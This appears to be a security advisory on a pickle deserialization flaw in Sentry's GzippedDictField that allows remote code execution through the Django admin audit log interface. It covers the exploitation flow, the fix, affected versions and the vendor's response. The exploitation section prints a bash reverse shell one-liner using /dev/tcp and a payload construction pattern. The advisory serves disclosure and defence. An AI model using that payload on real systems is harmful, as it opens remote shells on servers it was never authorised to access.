Introduction
Unsafe deserialization in Python's pickle module remains one of the most reliable paths to remote code execution, and Sentry versions through 8.2.0 contained exactly this pattern in a field accessible through the Django admin interface. An authenticated superuser could craft a malicious audit log entry that, when processed by Sentry's GzippedDictField, would execute arbitrary commands with application privileges.
Sentry is an application performance monitoring and error tracking platform developed by Functional Software Inc. The platform serves over 4 million developers and 150,000 organizations, with customers including Disney+, Cloudflare, GitHub, Anthropic, and Atlassian. Given this footprint, vulnerabilities in Sentry have meaningful implications across the enterprise software ecosystem.
Technical Information
The root cause of CVE-2021-47935 lies in the GzippedDictField implementation found in db/models/fields/gzippeddict.py. This field processes incoming data by calling pickle.loads(decompress(value)) without any input validation or sanitization. Python's pickle module is inherently unsafe when used on untrusted data because deserialization can trigger arbitrary object instantiation and code execution.
The GzippedDictField is not isolated to a single model. It is utilized by several core Sentry object models, including TagValue, Group, Activity, and AuditLogEntry. The AuditLogEntry model is the most directly exploitable because it is exposed through the Django administration interface.
Exploitation Flow
The exploitation path proceeds as follows:
- An attacker with superuser credentials authenticates to the Sentry instance.
- The attacker navigates to the Django administration endpoint at
http://sentry_host/admin/sentry/auditlogentry/. - The attacker creates or edits an audit log entry, submitting a crafted POST request that includes a malicious payload in the data field.
- This payload is a base64 encoded, gzip compressed, pickle serialized Python object designed to execute arbitrary commands.
The payload construction follows this pattern:
rev_shell = '/bin/bash -c "bash -i >& /dev/tcp/%s/%s 0>&1"' %(lhost,lport) payload = b64encode(compress(dumps(PickleExploit(rev_shell))))
When Sentry processes this audit log entry, the GzippedDictField automatically decompresses and deserializes the payload, triggering the embedded command execution. The commands run with the same privileges as the Sentry application process.
A complete exploit script is publicly available as Exploit DB entry 50318, published on September 22, 2021. The script automates the full attack chain: it retrieves CSRF tokens, authenticates as an administrator, and posts the malicious data to the audit log endpoint. Its public availability means defenders should treat this as a known, weaponized vulnerability.
The Fix
The fix, implemented in commit de5e334, marks AuditLogEntry fields as read only in the Django admin interface, specifically including the data field. The commit message explicitly states this resolves a superuser security concern regarding the injection of pickled data.
Affected Systems and Versions
The vulnerability spans multiple versions of the Sentry platform. Based on the available research:
| Status | Sentry Version | Notes |
|---|---|---|
| Vulnerable | 7.6.0 | Confirmed affected by Synacktiv |
| Vulnerable | 7.7.0 | Confirmed affected by Synacktiv |
| Vulnerable | 8.0.0 | Tested successfully by Exploit DB author |
| Vulnerable | 8.0.2 | Confirmed affected by Synacktiv |
| Vulnerable | 8.2.0 | Listed in the primary CVE description |
| Fixed | 8.1.4 | Official patch release |
| Fixed | 8.2.2 | Official patch release |
The source materials do not provide a comprehensive list of all vulnerable versions between 7.6.0 and 8.2.0. Administrators should assume all versions prior to 8.1.4 (in the 8.1.x branch) and 8.2.2 (in the 8.2.x branch) are vulnerable.
Vendor Security History
Sentry maintains a formal security and compliance program that includes vulnerability management, incident response, and access management. The vendor encourages vulnerability disclosure via a dedicated security email and states they rapidly verify each vulnerability before taking steps to fix it.
In the case of this specific deserialization flaw, Synacktiv reported the issue on April 3, 2015, and Sentry pushed security fixes on the exact same day. This same day turnaround demonstrates a responsive patching posture for critical security issues.
References
- NVD Entry for CVE-2021-47935
- CVE.org Entry for CVE-2021-47935
- VulnCheck Advisory: Sentry Remote Code Execution via Pickle Deserialization
- Exploit DB 50318: Sentry 8.2.0 Remote Code Execution (Authenticated)
- Synacktiv Advisory: Sentry Pickle Deserialization
- GitHub Commit de5e334: Mark AuditLogEntry fields as readonly
- Sentry Official Website
- Sentry Security and Compliance



